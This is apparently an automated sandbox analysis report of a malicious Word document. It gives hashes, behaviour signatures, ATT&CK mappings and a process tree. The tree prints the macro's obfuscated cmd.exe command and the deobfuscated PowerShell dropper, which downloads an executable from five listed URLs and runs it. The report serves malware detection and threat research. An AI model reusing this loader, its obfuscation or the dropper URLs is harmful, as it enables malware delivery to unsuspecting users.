Overview

overview

10

Static

static

8

ab37d198e0...c4.doc

windows7_x64

10

ab37d198e0...c4.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    144s
  • max time network
    170s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 00:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4.doc

  • Size

    141KB

  • MD5

    d2cc5525e1d27ab1814bf89562efd8d9

  • SHA1

    278d0e253423ba2e83f1b3851465251c209a8580

  • SHA256

    ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4

  • SHA512

    59725072fd48b6853e938ad289b8fe893fa48f61a0a0f5e3c377ba85f63514b55577b78e6bf7a3bd32b8d46a5f400805b64dd51965ed431f76a2d19a46a01191

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.niteshagrico.com/z7ISltpB
exe.dropper

http://www.tenmiengiarenhat.com/bIfcRi8Kc
exe.dropper

http://www.hopeintlschool.org/ebIV1do
exe.dropper

http://www.dnenes.com.mx/Wmv9Lwru
exe.dropper

http://kynangtuhoc.com/h6pTDOH

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3064
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2672
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D "
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1600
        • C:\Windows\system32\cmd.exe
          CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1540
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" ecHO %3fr% "
            4⤵
              PID:2684
            • C:\Windows\system32\cmd.exe
              cmD
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4044
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell $onlinewt='moderatorvr';$InvestmentAccountos=new-object Net.WebClient;$Ergonomicvs='http://www.niteshagrico.com/z7ISltpB@http://www.tenmiengiarenhat.com/bIfcRi8Kc@http://www.hopeintlschool.org/ebIV1do@http://www.dnenes.com.mx/Wmv9Lwru@http://kynangtuhoc.com/h6pTDOH'.Split('@');$GroceryAutomotiveAutomotivews='ROIso';$SmallFreshTunaaj = '224';$MoneyMarketAccountir='plugandplaywz';$HeardIslandandMcDonaldIslandski=$env:public+'\'+$SmallFreshTunaaj+'.exe';foreach($depositpq in $Ergonomicvs){try{$InvestmentAccountos.DownloadFile($depositpq, $HeardIslandandMcDonaldIslandski);$generatingjk='initiativeshi';If ((Get-Item $HeardIslandandMcDonaldIslandski).length -ge 80000) {Invoke-Item $HeardIslandandMcDonaldIslandski;$PersonalLoanAccountrf='Automotivevz';break;}}catch{}}$paradigmsdc='IncredibleConcreteKeyboardal';
                5⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1856

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1540-140-0x0000000000000000-mapping.dmp
        Download
      • memory/1600-139-0x0000000000000000-mapping.dmp
        Download
      • memory/1856-145-0x00007FF831E70000-0x00007FF832931000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1856-144-0x000001E0DE790000-0x000001E0DE7B2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1856-143-0x0000000000000000-mapping.dmp
        Download
      • memory/2672-137-0x0000000000000000-mapping.dmp
        Download
      • memory/2684-141-0x0000000000000000-mapping.dmp
        Download
      • memory/3064-135-0x00007FF81B520000-0x00007FF81B530000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3064-138-0x0000020629EB0000-0x0000020629EB4000-memory.dmp
        Filesize

        16KB

        Download
      • memory/3064-132-0x00007FF81D730000-0x00007FF81D740000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3064-131-0x00007FF81D730000-0x00007FF81D740000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3064-133-0x00007FF81D730000-0x00007FF81D740000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3064-136-0x00007FF81B520000-0x00007FF81B530000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3064-134-0x00007FF81D730000-0x00007FF81D740000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3064-130-0x00007FF81D730000-0x00007FF81D740000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3064-147-0x00007FF81D730000-0x00007FF81D740000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3064-148-0x00007FF81D730000-0x00007FF81D740000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3064-149-0x00007FF81D730000-0x00007FF81D740000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3064-150-0x00007FF81D730000-0x00007FF81D740000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4044-142-0x0000000000000000-mapping.dmp
        Download